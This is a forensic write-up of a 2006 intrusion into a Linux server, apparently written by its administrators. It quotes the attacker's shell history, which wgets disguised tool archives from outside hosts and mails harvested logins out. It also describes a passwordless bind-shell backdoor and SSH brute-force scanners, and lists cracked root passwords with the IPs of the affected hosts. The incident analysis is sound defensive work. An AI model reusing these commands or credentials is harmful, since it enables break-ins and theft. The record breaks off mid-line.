Forensics on Incident 1
Jump to navigation
Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
Breach in ns0 @ e..oss
Analysis
ps auwx: 2006/03/17 +-20:20 ======== test 30731 0.0 0.0 676 284 ? S 00:21 0:00 ./ntpd test 31116 0.0 0.2 2944 1360 ? Ss 00:28 0:00 SCREEN test 31117 0.0 0.2 3000 1228 pts/5 Ss 00:28 0:00 /bin/bash test 31134 0.0 0.2 3164 1368 pts/5 S+ 00:29 0:00 /bin/bash test 32352 0.0 0.0 1444 280 ? Ss 00:43 0:00 ./go test 25680 0.0 0.2 2944 1412 ? Ss 09:03 0:00 SCREEN test 25681 0.0 0.3 3000 1656 pts/6 Ss 09:03 0:00 /bin/bash test 25717 0.0 0.3 3160 1748 pts/6 S+ 09:03 0:00 /bin/bash test 4132 0.0 0.0 1344 204 pts/5 T+ 10:40 0:00 ./go test 4135 0.0 0.0 0 0 pts/5 Z+ 10:40 0:00 [go] <defunct> test 3211 0.0 0.0 1344 240 pts/5 T+ 20:05 0:00 ./go test 3224 0.0 0.0 0 0 pts/5 Z+ 20:05 0:00 [go] <defunct> test 4088 0.0 0.2 2704 1260 pts/6 S+ 20:35 0:00 /bin/bash ./assh 24.35 test 4089 49.4 0.0 1492 456 pts/6 R+ 20:35 4:43 ./pscan2 24.35 22 test 4090 0.0 0.0 0 0 pts/6 Z+ 20:35 0:00 [pscan2] <defunct> test 4097 0.0 0.2 2704 1260 pts/5 S+ 20:35 0:00 /bin/bash ./assh 200.56 test 4098 49.4 0.0 1492 456 pts/5 R+ 20:35 4:43 ./pscan2 200.56 22 test 4099 0.0 0.0 0 0 pts/5 Z+ 20:35 0:00 [pscan2] <defunct> Screens: ======== test@ns0:/root$ screen -ls screen -r test/ There are screens on: 31116.pts-4.ns0 (Detached) 25680.pts-4.ns0 (Detached) 2 Sockets in /var/run/screen/S-test. test@ns0:/root$ screen -r 31116 First screen: ============= Copy of the current page: bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 200.58.255.* (total: 0) (100.0% done) # pscan completed in 820 seconds. (found 0 ips) # Cam putin : 0 de servere ---------------------------------------- # Se apropie sfarsitu :P Fii pe faza Dane.. ping: unknown host www.yahoo.com Toata dragostea mea pentru diavola!!!!!! bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 200.59.112.* (total: 0) (43.9% done) Second screen: ============== Copy of the full screen buffer: test@ns0:/var/tmp/.. /dan$ test@ns0:/var/tmp/.. /dan$ ls 200 assh gen-pass.sh pass_file sshf 200.221.pscan.22 auto go pscan2 ssh-scan 200.59.pscan.22 common go.sh ss vuln.txt bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 24.37.255.* (total: 0) (100.0% done) # pscan completed in 820 seconds. (found 0 ips) # Cam putin : 0 de servere ---------------------------------------- # Se apropie sfarsitu :P Fii pe faza Dane.. ping: unknown host www.yahoo.com Toata dragostea mea pentru diavola!!!!!! bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 24.38.136.* (total: 0) (53.3% done) test@ns0:/var/tmp/.. /2$ ./auto Enter A class range 24 Enter output file 24 test@ns0:/var/tmp/.. /2$ chmod +x 24 test@ns0:/var/tmp/.. /2$ ./24 ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### ... Bash history: ============= Ran history in screen 25680.pts-4.ns0: test@ns0:/var/tmp/.. /2$ history 48 first line identical to .bash_history then 49 ./auto 50 chmod +x 24 51 ./24 Content of .bash_history: ls cd ls wget wget rzv69.marte.ro/rzv69.tgz tar zxvf rzv69.tgz ls del 404 wget fire.prohosting.com/claubuc/scaner.jpg tar xzvf scaner.jpg cd scaner ./assh 207.44 ls ./auto 207.44 ./assh 213.186 cd /var/tmp cd .." " screen w passwd w cd /var/tmp ls -a cd /home/test/ ls -a cd scaner ls -a cat vuln.txt cd /var/tmp cat /etc/hosts su vinoj su vinoj su trollingsecours su trollingsecours su trollingsecours cd /var/tmp ls -a mkdir .." " cd .." " wget fire.prohosting.com/scarlatu/dan.jpg wget fire.prohosting.com/scarlatu/psy.jpg tar xzvf psy.jpg cd .bash ./ntpd cd .. tar xzvf dan.jpg cd dan screen ls -a ./go.sh 200.41 ./assh 200.41 exit w screen -r screen -r 30860.pts-2.ns0 screen -r 31116.pts-4.ns0 cd /var/tmp cd .." " cd dan pico vuln.txt rm -rf vuln.txt touch vuln.txt cd .. tar xzvf dan.jpg ls -a cd dan ls -a cd .. mv dan 1 tar xzvf dan.jpg mv dan 2 mv 1 dan ls -a cd 2 screen screen -r screen -r 30860.pts-2.ns0 screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 cd /var/tmp cd .." " cd 2 pico vuln.txt cd .. cd dan pico vuln.txt cat vuln.txt clear w screen -r screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 w ls -a cd /var/tmp cd .." " cd dan vi vuln.txt cd /var/tmp cd .." " cd dan vi vuln.txt ls -a cd .. cd 2 vi vuln.txt ls -a w screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 cd /var/tmp cd .." " cd .." " cd dan vi vuln.txt ls -a cd .. cd 2 vi vuln.txt ls -a screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 ftp screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 ftp screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 w screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 crontab -e Tools: ====== * Attempt to download rzv69.marte.ro/rzv69.tgz, err 404 * Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz) * Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz) * Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz) * Romanian scripts * Compiled By D-a-N * cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools) * cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools) Scans: ====== * scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186 Netstat Abstract: (within the 800 simultaneous scans) tcp 0 1 213.186.53.59:59930 24.35.236.71:22 SYN_SENT 4089/pscan2 tcp 0 1 213.186.53.59:60352 200.56.236.93:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60288 200.56.236.29:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60424 200.56.236.165:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60233 200.56.235.229:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60169 200.56.235.165:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60095 200.56.235.91:22 SYN_SENT 4098/pscan2 IRC: ==== * Connection to IRC(6667) with psyBNC(ntpd) to 195.204.1.130 ** = oslo1.no.eu.undernet.org Netstat: tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 30731/ntpd tcp 0 0 213.186.53.59:34227 195.204.1.130:6667 ESTABLISHED30731/ntpd Diffs between the downloaded tool and the hacker's version: --- log/psybnc.log 1970-01-01 01:00:00.000000000 +0100 +++ log/psybnc.log 2006-03-19 23:32:53.000000000 +0100 @@ -0,0 +1,15 @@ +Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667 +Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731) +Fri Mar 17 00:21:14 :Loading all Users.. +Fri Mar 17 00:21:14 :No Users found. +Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net +Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan) +Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net +Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de dan +Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat +Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 (). +Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 () +Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined) +Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 (). +Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 () +Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net) --- motd/USER1.MOTD 1970-01-01 01:00:00.000000000 +0100 +++ motd/USER1.MOTD 2006-03-19 23:32:53.000000000 +0100 @@ -0,0 +1,71 @@ +:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL +:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07 +:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST +:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov +:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server +:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server +:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers +:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online +:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s) +:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed +:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers +:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day - +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Welome to Oslo*.NO.EU.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Disclaimer / Rules +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Irc is an umoderated international medium. Cloning is +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- strictly forbidden on this server, any clones will +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not be tolerated. Mass Messaging / Mass Invites are not +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- allowed on any Undernet server, any offenders will be killed. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Using this server means you agree to all of its rules and the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- rules of Undernet. If you cannot agree to this then /quit now. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Server contact info: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- E-mail : oslo@undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> News: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.05.2005] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are out of news. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.12.2004] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We shut down the channel #banetele. Most of the users in there needed +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- reop/channel related helping and we have #nastrand for that. For info +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not related to channel/user problems, email oslo@undernet.org. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [26.08.2003] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are back online :) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Thank you to our provider www.banetele.com for all help! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Ports: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 6666, 6667, 6668, 7000 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Bot Policies: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- It is allowed to run NON abusive bots on this server, all abusive +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- bots will be killed on sight. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Undernet has Cservice. Go to http://cservice.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- or #Cservice if you have any questions. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Help Channels: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #nastrand -> Oper/IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #cservice -> Cservice questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #mIRC -> For mIRC questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #vh -> For help with viruses +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #helpchan -> IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Please notice that these channels are not administrated by the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- oslo.* crew and we and/or the server sponsors can not be held +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- responsible for actions taken or info given in the channels. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> AGAIN .. READ THIS !! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- The use of this server is no right, but a privilege. The admin(s) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- and opers can revoke this priviledge without further notice and +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- without a reason. +:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command. --- psybnc.conf 2003-04-07 14:47:00.000000000 +0200 +++ psybnc.conf 2006-03-19 23:32:53.000000000 +0100 @@ -1,3 +1,25 @@ PSYBNC.SYSTEM.PORT1=6667 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* +USER1.USER.LOGIN=dan +USER1.USER.USER=x +USER1.USER.PASS==0x'q'0'W`2'S0I'F`x +USER1.USER.RIGHTS=1 +USER1.USER.VLINK=0 +USER1.USER.PPORT=0 +USER1.USER.PARENT=0 +USER1.USER.QUITTED=0 +USER1.USER.DCCENABLED=1 +USER1.USER.AUTOGETDCC=0 +USER1.USER.AIDLE=0 +USER1.USER.LEAVEQUIT=0 +USER1.USER.AUTOREJOIN=1 +USER1.USER.SYSMSG=1 +USER1.USER.LASTLOG=0 +USER1.USER.NICK=D-a-N +USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org +USER1.SERVERS.PORT2=6667 +USER1.SERVERS.SERVER2=195.204.1.130 +USER1.SERVERS.PORT1=6667 +USER1.CHANNELS.ENTRY1=#porumbei +USER1.CHANNELS.ENTRY0=#xibit Backdoor: ========= * ./go opens port 19876 with a shell without auth cf http://www.2701.org/archive/200311240000.html Netstat: tcp 0 0 0.0.0.0:19876 0.0.0.0:* LISTEN 32352/go * ./ss cf http://www.securiteam.com/tools/5EP0B0ADFO.html Fast SYN Scanner (libnet, libpcap) 11 Jul. 2004 Credit: The information has been provided by Doctor BIOS. The following tool is a fast SYN scanner written in C. vuln.txt: ========= cf http://www.lockeddown.net/rst-expl.txt ssh brute-force: ================ ssh-scan and sshf ./sshf <procese adika cate de alea deodata incerc> ~= how many processes to run together /etc/passwd: ============ test:x:1024:1024:,,,:/home/test:/bin/false mails: ====== cat /etc/passwd /sbin/ifconfig |grep inet cat /etc/hosts uname -a w ping -c 3 www.yahoo.com cat vuln.txt chmod +x go ./go 139P Received: from test by ns0.exxoss.com with local (Exim 4.50) for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100 023T To: usdpower@yahoo.com 023 Subject: linux-printer 047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com> 034F From: ",,," <test@ns0.exxoss.com> 038 Date: Fri, 17 Mar 2006 17:35:14 +0100 To-be-Mailed data: administrator:administrator:24.16.169.218 guest:guest:24.16.169.218 test:test:24.3.178.253 mysql:mysql:200.27.145.74 root:admin1:200.31.199.77 root:password:24.8.131.152 root:secure:24.11.225.20 root:123456:200.32.86.228 root:1234567890:200.32.86.228 root:admin1:200.32.86.228 root:admin:200.32.86.228 root:administrator1:200.32.86.228 root:backup:200.32.86.228 root:passwd:200.32.86.228 root:password123:200.32.86.228 root:password:200.32.86.228 root:qwerty:200.32.86.228 root:root1:200.32.86.228 root:root:200.32.86.228 root:rootroot:200.32.86.228 root:secret:200.32.86.228 root:secure:200.32.86.228 root:administrator:200.32.86.228 (honeypot probably) RST virus: ========== Quick and dirty way to find infected files: find . -type f -exec strings --all {} \; |grep snortdos Files: "Dumb" scan of all files Switches: -ARCHIVE -PACKED -SERVER /tmp/scaner/go Infection: Unix/RST.B /tmp/scaner/pscan2 Infection: Unix/RST.B /tmp/scaner/ss Infection: Unix/RST.B /tmp/scaner/ssh-scan Infection: Unix/RST.B /tmp/scaner/sshf Infection: Unix/RST.B Results of virus scanning: Infected: 5 Seems that infected files are updating them at each run and modify the timestamp /home/test/scaner: 23714 2006-03-06 23:23 go 25503 2005-05-06 19:00 pscan2 458068 2006-03-07 00:03 ss 846520 2006-03-07 00:03 sshf 846832 2006-03-06 23:12 ssh-scan /var/tmp/.. /2: 23714 2006-03-17 21:17 go 25503 2006-03-17 21:17 pscan2 458068 2006-03-17 21:17 ss 846520 2006-03-17 21:17 sshf 846832 2006-03-17 21:17 ssh-scan /var/tmp/.. /dan: 23714 2006-03-17 10:35 go 25503 2006-03-17 21:17 pscan2 458068 2006-03-17 21:17 ss 846520 2006-03-17 21:17 sshf 846832 2006-03-17 21:17 ssh-scan 21:17 corresponds to the crash of the server so probably infected executables are left open even after being killed Note: same virus present also in: /ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND /ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND TIMELINE: ========= 2006/02/16 08:58:08 82.79.137.30 vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client "82.79.137.30" Mar 6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be Mar 6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2 Mar 6 12:29:31 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash Mar 06 06 12:30:50 4096 m.c drwxr-xr-x root root /etc/webmin 639 m.c -rw------- root root /etc/webmin/miniserv.conf Mar 6 12:31:05 localhost webmin[31297]: Webmin starting Mar 6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be 2006/03/06 13:48:47 82.79.137.24 * vsftpd: Mon Mar 6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client "82.79.137.24" Mar 03 06 15:53:30 21 m.c -rw-r----- root shadow /etc/webmin/miniserv.users Mar 03 06 16:11:31 4096 m.c drwxr-xr-x root root /etc/exim4 7838 m.c -rw-r--r-- root root /etc/exim4/exim4.conf Mar 6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2 Mar 6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2 Mar 6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash Mar 6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2 dorian12 pts/2 217.117.45.148 Mon Mar 6 21:38 - 21:40 (00:01) Mar 6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2 Mar 6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash 2006/03/06 22:27:30 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-" 2006/03/06 22:27:31 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-" 2006/03/06 22:28:16 82.79.137.27 Mar 6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27 2006/03/06 22:28:18 82.79.137.27 vsftpd: Mon Mar 6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client "82.79.137.27" 2006/03/06 22:28:18 82.79.137.18 Mar 6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18 2006/03/06 22:28:20 82.79.137.18 vsftpd: Mon Mar 6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client "82.79.137.18" 2006/03/06 22:28:29 82.79.137.25 * vsftpd: Mon Mar 6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client "82.79.137.25" 2006/03/06 22:28:30 82.79.137.14 * vsftpd: Mon Mar 6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client "82.79.137.14" 2006/03/06 22:28:39 82.79.137.22 Mar 6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro user=test 2006/03/06 22:28:41 82.79.137.22 Mar 6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro 2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2 2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0) 2006/03/06 22:28 82.79.137.22 * test pts/2 82.79.137.22 Mon Mar 6 22:28 - 00:21 (01:52) 2006/03/06 22:31:06 82.79.137.18 Mar 6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18 2006/03/06 23:29:14 82.79.137.7 * vsftpd: Mon Mar 6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client "82.79.137.7" 2006/03/06 22:40:54 82.79.137.22 *! Mar 06 06 22:40:54 167818 m.. -rw-r--r-- test test /home/test/scaner/207.44.pscan.22 2006/03/06 23:12:35 82.79.137.22 *! Mar 06 06 23:12:35 846832 m.. -rwxr-xr-x test test /home/test/scaner/ssh-scan 2006/03/06 23:23:56 82.79.137.22 *! Mar 06 06 23:23:56 23714 m.. -rwxr-xr-x test test /home/test/scaner/go 2006/03/06 00:03:34 82.79.137.22 *! Mar 07 06 00:03:34 846520 m.. -rwxr-xr-x test test /home/test/scaner/sshf 2006/03/06 00:03:34 82.79.137.22 *! 4096 m.. drwxr-xr-x test test /home/test/scaner 2006/03/06 00:03:34 82.79.137.22 *! 458068 m.. -rwxr-xr-x test test /home/test/scaner/ss skycode pts/3 213.186.53.55 Tue Mar 7 00:14 - down (00:45) 2006/03/07 00:21:24 82.79.137.22 * Mar 7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test skycode pts/2 213.186.53.55 Tue Mar 7 00:58 - down (00:01) runlevel (to lvl 6) Tue Mar 7 00:59 - 00:59 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 00:59 - 01:02 (00:02) 2.4.27-2-386 reboot system boot Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386 skycode pts/0 Tue Mar 7 01:04 - 01:04 (00:00) 213.186.53.55 skycode pts/0 Tue Mar 7 08:28 - down (00:16) 213.186.53.55 runlevel (to lvl 6) Tue Mar 7 08:45 - 08:45 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 08:45 - 08:48 (00:02) 2.4.27-2-386 reboot system boot Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386 skycode pts/0 Tue Mar 7 08:56 - down (00:22) 213.186.53.55 skycode pts/1 Tue Mar 7 09:17 - down (00:01) 213.186.53.55 runlevel (to lvl 6) Tue Mar 7 09:18 - 09:18 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 09:18 - 09:22 (00:03) 2.4.27-2-386 reboot system boot Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386 skycode pts/0 Tue Mar 7 09:23 - down (00:01) 217.136.140.81 runlevel (to lvl 6) Tue Mar 7 09:25 - 09:25 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 09:25 - 09:28 (00:02) 2.4.27-2-386 reboot system boot Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386 skycode pts/0 Tue Mar 7 09:34 - down (00:09) 217.136.140.81 runlevel (to lvl 6) Tue Mar 7 09:44 - 09:44 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 09:44 - 09:48 (00:04) 2.4.27-2-386 reboot system boot Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386 2006/03/09 14:57:31 82.79.137.27 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client "82.79.137.27" 2006/03/09 14:57:31 82.79.137.26 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client "82.79.137.26" 2006/03/09 14:57:31 82.79.137.28 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client "82.79.137.28" 2006/03/09 14:57:31 82.79.137.7 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client "82.79.137.7" 2006/03/09 14:57:33 82.79.137.28 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client "82.79.137.28" 2006/03/09 14:57:33 82.79.137.30 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client "82.79.137.30" 2006/03/09 15:01:29 82.79.137.30 30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:01:30 82.79.137.30 30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:01:34 82.79.137.6 Mar 9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6 2006/03/09 15:01:36 82.79.137.6 vsftpd: Thu Mar 9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client 